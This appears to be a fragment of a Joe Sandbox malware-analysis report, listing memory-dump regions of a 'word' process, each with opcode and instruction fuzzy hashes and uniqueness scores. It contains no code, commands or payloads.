                        • Source File: 00000014.00000002.522177543.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fd8aac872e03e5706162177ec75b30dcbaca9dd9154b328132557c10564c539
                        • Instruction ID: 62e0e1d10855191878d5191c2c8ba0109d77052940c7c2c087c7d49327650786
                        • Opcode Fuzzy Hash: 8fd8aac872e03e5706162177ec75b30dcbaca9dd9154b328132557c10564c539
                        • Instruction Fuzzy Hash: 62F0E932B04535DBDF36266AA9045393E66EBC7B723248079DC0AC7345CA728D46F793
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cff1d084be2a12fff1bb5dd0589d867b40174992478ee4ef72e6b75873d28ac
                        • Instruction ID: e95c83bce1e2303eba9c0f04aebac8abeee1549137e005368388f549ebe41555
                        • Opcode Fuzzy Hash: 5cff1d084be2a12fff1bb5dd0589d867b40174992478ee4ef72e6b75873d28ac
                        • Instruction Fuzzy Hash: C0016D70E04248CFCB14CFAAD4C05DDFBF2AF89320F288169E418EB2A4EB309941CB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b2d02229c4628d4fe649873f46f5c57918f2bd4c2f4b941f69ffa8afebac2775
                        • Instruction ID: bbbf7ee0ee6698ce811e6d508b68dcd2eaedaada421d6ce26d13e6625a4bf011
                        • Opcode Fuzzy Hash: b2d02229c4628d4fe649873f46f5c57918f2bd4c2f4b941f69ffa8afebac2775
                        • Instruction Fuzzy Hash: 39014670909248EFCB58EFB4D9496ECBBB4EF46304F1080AAC419EB262DB340B44CB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1074df45d1e292f0dc9ce2b4e2a6ca54fe237ac120a11f87653adc8aa7051401
                        • Instruction ID: 87065af66b582da41717b7a0cf3eb50b3ed46820c15337ddacf43a0448a5facc
                        • Opcode Fuzzy Hash: 1074df45d1e292f0dc9ce2b4e2a6ca54fe237ac120a11f87653adc8aa7051401
                        • Instruction Fuzzy Hash: AAF0A72D3052587F8313276668458BB7B6AEFC6629314416FF405D7743D9245D01C3E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f98dbf839ae5cd420f365a9ab40d549fbaba86d003b2f17f6dc070aad32fd1ac
                        • Instruction ID: 3399a8f234f1d77ec6768cfdc22e69c7e76aba9c9468ca16cb0fe410f9baafc3
                        • Opcode Fuzzy Hash: f98dbf839ae5cd420f365a9ab40d549fbaba86d003b2f17f6dc070aad32fd1ac
                        • Instruction Fuzzy Hash: AEF03A25F901858BDB26ABF488663BEB5A25BC8718F20446DD116AB794CF784C018BE6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e930270a5bec4a0eace2f97c5011f6b4e98dd0c28cf4be556c894c05cd572f5d
                        • Instruction ID: ce8c14bbf7c86788cabddf05db5e17dfa8fd862bb9578aa8dab9e6d2f4f94fda
                        • Opcode Fuzzy Hash: e930270a5bec4a0eace2f97c5011f6b4e98dd0c28cf4be556c894c05cd572f5d
                        • Instruction Fuzzy Hash: 80F0823920510CAFCB169E85F844FE6776EEF89310F04802AF90987351CA759D91D791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6114b16bc954cebe9ac330839bdb0a667a22caabde7e12100bef3760d4c82c82
                        • Instruction ID: eeb11afcb4ba14f7c3c9ddcbf1bf3a3bb800891b8500a058927013d7357fa082
                        • Opcode Fuzzy Hash: 6114b16bc954cebe9ac330839bdb0a667a22caabde7e12100bef3760d4c82c82
                        • Instruction Fuzzy Hash: BCF08C3021C2414BC728EB75E8908BFB35A9EC5324300CF2CD1668B2E1CF60694A9B90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a09e1d52cf32935346c1e24957e6e4d1a1ebc937fa1b9297dfb2f6042e40aa81
                        • Instruction ID: cef1eed219fb46d790a3a6725cc3b942c2184e8ad6725800bb8de1006c0a408d
                        • Opcode Fuzzy Hash: a09e1d52cf32935346c1e24957e6e4d1a1ebc937fa1b9297dfb2f6042e40aa81
                        • Instruction Fuzzy Hash: 63F030302182414BC618EB76E99187FB35BDEC5334700CF38D1668B2E1DF74694A9BD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1a1148e804cb8b83fe3b8c02c2237e65afc5fd1d6382dce0d42ea0705a86eeb
                        • Instruction ID: e285a701d5f0e36734703d05550e58da1e6f8e1419ec550d3102c35df258be97
                        • Opcode Fuzzy Hash: b1a1148e804cb8b83fe3b8c02c2237e65afc5fd1d6382dce0d42ea0705a86eeb
                        • Instruction Fuzzy Hash: CFE09B72A0D0086FCB11EFB4A5416ED7795DBC0318F104BBBD509D7551DB310B54AB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d31a6c4375e99d4ecc575b6c6d003ede6a406144c44910dcaaaf258f225bd5b0
                        • Instruction ID: 6355df539507fefe29c9f47de4196b758688d8e8dc62f01b8f57bf544f13a6de
                        • Opcode Fuzzy Hash: d31a6c4375e99d4ecc575b6c6d003ede6a406144c44910dcaaaf258f225bd5b0
                        • Instruction Fuzzy Hash: 7AF0127960E3D15FC3438B18C8615967F70EF96114B1A84DBD480CB6A3D6208C1AC7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c07fcbe90ba5a336eeb2ebbda34570a304502fa59702d09183ca1826828879c8
                        • Instruction ID: af792595eda68eef797d3938ae541d8d9f9d0daa077ac789ea1b5c650c7a8deb
                        • Opcode Fuzzy Hash: c07fcbe90ba5a336eeb2ebbda34570a304502fa59702d09183ca1826828879c8
                        • Instruction Fuzzy Hash: 58E09A311082E87FC302CF9998109B6BFFC9E8E51470880CBF894CB292D669DE02D7B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 59dfa23d30950b302189b670bdee2c4c262a7e035a05490647a1b0c91fb28e77
                        • Instruction ID: c79c6e5ff17c6287b09c16cff85fa09eb5c9ba35a885ff7d957bff0efad93b7b
                        • Opcode Fuzzy Hash: 59dfa23d30950b302189b670bdee2c4c262a7e035a05490647a1b0c91fb28e77
                        • Instruction Fuzzy Hash: 43F0826D40F2C8EFE713D77598515857FA8DB06104B1180E6D240CB593DA744909DFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba83448dd81c0f63d84d477a1a08a716fac1c6cb04b1e24880345dc345500f8e
                        • Instruction ID: ad15f131d49d5dfdac40f1d433844e734a140a12ce8efc53a328bfc5c8e14619
                        • Opcode Fuzzy Hash: ba83448dd81c0f63d84d477a1a08a716fac1c6cb04b1e24880345dc345500f8e
                        • Instruction Fuzzy Hash: 86F0A77420C244CFC704DFA4E09069E3BA6EF89305F208458E0059F3A9DB309996DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db9be8b5e0b20120c9c8344fd5d4ecdd4f17aba7fa39ddbc1fa2815746aaebdc
                        • Instruction ID: 20f9f57dedcdaa2abdbd15b46da2f8f160b16efd78d699eda58b4cc5b0a7f0c4
                        • Opcode Fuzzy Hash: db9be8b5e0b20120c9c8344fd5d4ecdd4f17aba7fa39ddbc1fa2815746aaebdc
                        • Instruction Fuzzy Hash: BAE0C23D3042187B1116266A7889CBFBB9FEBCA67E314412EF90AD3745DD61AC0297F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5fba4437ebfe13ccfd27e19d960ca709d3610c5d84cde4585f95205c073dd682
                        • Instruction ID: ece11b257e6b02ccd1bc586019412be8e5acf7ee00f1b7d9d20a4c0b9c04abac
                        • Opcode Fuzzy Hash: 5fba4437ebfe13ccfd27e19d960ca709d3610c5d84cde4585f95205c073dd682
                        • Instruction Fuzzy Hash: 52E01A2820E7D04FE3038A3844620E67F60DE8324834995CBD0E4CF2A3C609994BE7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7fa954f2a3d2fe518eddf381b1f18848ba2f20c5cf008b50d1258e2348ed6902
                        • Instruction ID: ff95b350ec7ccba876429304bf6ad7755d021f4b0b6d7110e3e9ca9150400c62
                        • Opcode Fuzzy Hash: 7fa954f2a3d2fe518eddf381b1f18848ba2f20c5cf008b50d1258e2348ed6902
                        • Instruction Fuzzy Hash: 0BF03A70904218CFDB54DF95D4847AEBBB1FB49305F248569D025AB2A5C775C442CF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34359da37d62c5428ed99d58907aefe4215d4b34400f2d8ae00d7bacce42a126
                        • Instruction ID: 77fc119f2a78d005c3753a4faad20332ec386d52826e06531f847d4d762daf5f
                        • Opcode Fuzzy Hash: 34359da37d62c5428ed99d58907aefe4215d4b34400f2d8ae00d7bacce42a126
                        • Instruction Fuzzy Hash: 9CE0923D6482858FC303CBB584A08E5BFB09E9620935D81DED44DCB327C222D812EB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f5ca8c9cbb5507b12c1481599fdb505a6fe7fe1ed0f11d1ad23375f54b828b7
                        • Instruction ID: df18251493c2ecd7cc41abe9711723e9fc05a3339ac3dd3925f7362f23c35b8e
                        • Opcode Fuzzy Hash: 2f5ca8c9cbb5507b12c1481599fdb505a6fe7fe1ed0f11d1ad23375f54b828b7
                        • Instruction Fuzzy Hash: E5E04FA691920DEFC703EFA0C9114DABBB8EF0625571011D6E145DB222EA314B14D7D2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6885378b28059be56a8e10de573c23f8840a45a3d71de18e88bc2a28b77be024
                        • Instruction ID: b53ea816f06ce8ebc9974666713bcde73f0bd24fc50ed02319e2dfab3498d380
                        • Opcode Fuzzy Hash: 6885378b28059be56a8e10de573c23f8840a45a3d71de18e88bc2a28b77be024
                        • Instruction Fuzzy Hash: 7BE0467045A3849FCB269B70A8687AE7F30FF07702B140A9AD449D21A2C6690829C726
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f9444abae650f2db0467788cb9c558e5be5e441e8008bb534e688edaf8f5dc1
                        • Instruction ID: 76bcf7f701f96514f000c8694aaf27fc48b9d2a0ab9c4b01a0e2657d969c3bf8
                        • Opcode Fuzzy Hash: 9f9444abae650f2db0467788cb9c558e5be5e441e8008bb534e688edaf8f5dc1
                        • Instruction Fuzzy Hash: 56E04831105259BFCB028F94DD01CA67F75EF4A2507088087FD148B262D672DD22D7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e7087c51ca1bc4c91bc47e5ec24f478366443aecafbc702753c505817ffc3e6
                        • Instruction ID: 7b00f89e02a883f68c4d40685ef7eccd6e07d91d7643ef753e54c0d95484ae8f
                        • Opcode Fuzzy Hash: 2e7087c51ca1bc4c91bc47e5ec24f478366443aecafbc702753c505817ffc3e6
                        • Instruction Fuzzy Hash: 4EF0ED75A05158CFEB14CF45D8C5E9CFBB2FB85310F6080A6E60A9B260D7309A819F50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3362796eaa6aabab80d8c6298f6ef439a2a05c3ca9fee3255f7156990596d3e2
                        • Instruction ID: 36dd9321ccf68b4a7326356eb60ce21d83d3f8b709bd9a01aee8efe82f0d1c63
                        • Opcode Fuzzy Hash: 3362796eaa6aabab80d8c6298f6ef439a2a05c3ca9fee3255f7156990596d3e2
                        • Instruction Fuzzy Hash: A6E01A3810E2D19FC3078F6498258A6BFB59F9B50470984CFE5C09B263C556AC16EBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26339720f9b8c13a225c9cd6cb74a5860d3fffbb6e34570cdfc3c84ff9d87a0d
                        • Instruction ID: 0ad11478aea1f9daf64b9ce7e12f2a5e58d78fa434f81bf53ab72a1f7db5c43f
                        • Opcode Fuzzy Hash: 26339720f9b8c13a225c9cd6cb74a5860d3fffbb6e34570cdfc3c84ff9d87a0d
                        • Instruction Fuzzy Hash: 89E01A6121C3A19EC312CF54D820866BFB89F9A50070884CFB480DB262C5659D46C7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 045652ea90397be9c317d5d325e5d953bbe2dcf79b2bfecc4bb5736af40d6b3d
                        • Instruction ID: 2049c112dfd07bc591f29116c45f72b6a20a184b8454b8ebdc45927318c1e8cb
                        • Opcode Fuzzy Hash: 045652ea90397be9c317d5d325e5d953bbe2dcf79b2bfecc4bb5736af40d6b3d
                        • Instruction Fuzzy Hash: 17D012723044187BDB056A8DE811FEB3B5ED7C9722F108026F6058B245C9768C15A7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a2fc1dd30282c6d370a5f0cd3d3a46db21d5576b66104013382901d776e9346
                        • Instruction ID: 7fb89bdc460d370611bbc6629a4dc5f0ec6b081ee801ba5561c4d74dabc0c674
                        • Opcode Fuzzy Hash: 1a2fc1dd30282c6d370a5f0cd3d3a46db21d5576b66104013382901d776e9346
                        • Instruction Fuzzy Hash: E4E08C36201108AFCB018E84DC009E57B25EF99220B24C05AFC088B352CBB6CD22DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 760fd3c0ac81ec19eec389e122287e902dea6f9ca10aa4fa969e1982374a9c45
                        • Instruction ID: 69186bab56ec35caf9f157c9eb28db1e5dac9483321d8eccac8e5273abf7206e
                        • Opcode Fuzzy Hash: 760fd3c0ac81ec19eec389e122287e902dea6f9ca10aa4fa969e1982374a9c45
                        • Instruction Fuzzy Hash: 9EE086725091586FC741CE84D850CA57F79DB46210714C09BFC59CB252C672CD12DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad7f07e8b7138548a3668f2d9d9916c287e1dd6495eae164f50346d5d38161e2
                        • Instruction ID: 605ac9dde7f63b032b458acc5ddabd2e5adea7cf3fe3a4d3d2b5ca302bfb6a93
                        • Opcode Fuzzy Hash: ad7f07e8b7138548a3668f2d9d9916c287e1dd6495eae164f50346d5d38161e2
                        • Instruction Fuzzy Hash: A7E04676C0E2C8EFDB02DFB495214A9BFB1CE0320571506DBD586CB222E9215A14A762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12017ecb7c58c7c658a2e7300404f15a13f8d6a8cede6095cf578772ecc56656
                        • Instruction ID: e7cac946107f36f632040eb6423c3c6044e1d1c170fe5eebdce5a92198f5ce72
                        • Opcode Fuzzy Hash: 12017ecb7c58c7c658a2e7300404f15a13f8d6a8cede6095cf578772ecc56656
                        • Instruction Fuzzy Hash: 7DE0863510C2914FC306CF14E560866BFB4DF8650071444CFF48487362C9269D0BC772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 108890d25d8aea0c122dbb23362f61fb2e88a4dfb491941cb9155ff6ec988f78
                        • Instruction ID: 0cae6f821d1ad7be05064e2469278cba04b52c1ce4ed7a254121aaa2708530e6
                        • Opcode Fuzzy Hash: 108890d25d8aea0c122dbb23362f61fb2e88a4dfb491941cb9155ff6ec988f78
                        • Instruction Fuzzy Hash: A1E08C7020D3919FC343CB24EA9086ABFB5DFC6A1070884DFF4849B262C5618D0AC773
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b464d81e480cbcaf673041fd15619aa00ad447e2291f6eabbeda784472a8b650
                        • Instruction ID: 96108f3601c2931261168f17435c485dcffd460060eff0af934b4aee1cdef0a0
                        • Opcode Fuzzy Hash: b464d81e480cbcaf673041fd15619aa00ad447e2291f6eabbeda784472a8b650
                        • Instruction Fuzzy Hash: 63E0EC3820D6C24FC316CB28C8615A5BFB1AFDB204B18D4EAD5A4CF367C5359813EB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f018e5337d0d2097d958a7bba93b527a067244e9515c3af7d4fd514916c5c3a2
                        • Instruction ID: 7e61b6b8a4660dd399d16a935b675e300f384d05eb2b79e61a8014dad0b33cc0
                        • Opcode Fuzzy Hash: f018e5337d0d2097d958a7bba93b527a067244e9515c3af7d4fd514916c5c3a2
                        • Instruction Fuzzy Hash: AEE0CD7A80D20CAFD703DFE0899148D7FB4CF02109F1045EED503D7111DD314A109791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 723336ce1e76aadef1ec9f648200d811a86af0aa58933574d69a5d4d31ed7446
                        • Instruction ID: 126cc4b9b9d36587839a0d36aa8d3489696d17be3d9833fc0e08181a227376fd
                        • Opcode Fuzzy Hash: 723336ce1e76aadef1ec9f648200d811a86af0aa58933574d69a5d4d31ed7446
                        • Instruction Fuzzy Hash: FBD017742192409BC742CB58C855892BBB19F97208308D0AEE084CF362EA21A903C7A6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b1f4ec4238c9fabb961155206db29b8f76aa941874cb256a3ad01fdc351839e
                        • Instruction ID: edb2a35e76dd0769a8fd8281e7463155538368ee37250813737257cc5cfa8b97
                        • Opcode Fuzzy Hash: 9b1f4ec4238c9fabb961155206db29b8f76aa941874cb256a3ad01fdc351839e
                        • Instruction Fuzzy Hash: 5BD0C72C7552415FC7479B14D850491B7B19FCA30431894E9B50CCB762DA258D07C755
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        • String ID:
                        • API String ID:
                        • Opcode ID: 43fbd7198a960a2e6fefe79bcae40bd23e08525254a326f4f3cae3710f288c22
                        • Instruction ID: 726efb66c1b33969e9f61b91f6a59893d17cd8fcba1a7a0dc47ba4a991849e77
                        • Opcode Fuzzy Hash: 43fbd7198a960a2e6fefe79bcae40bd23e08525254a326f4f3cae3710f288c22
                        • Instruction Fuzzy Hash: 5DB09288888002C9C6802F94892C3D2BBB1FF00204FAA02B05D040B90AE22A05956348
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                        • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                        • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                        • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
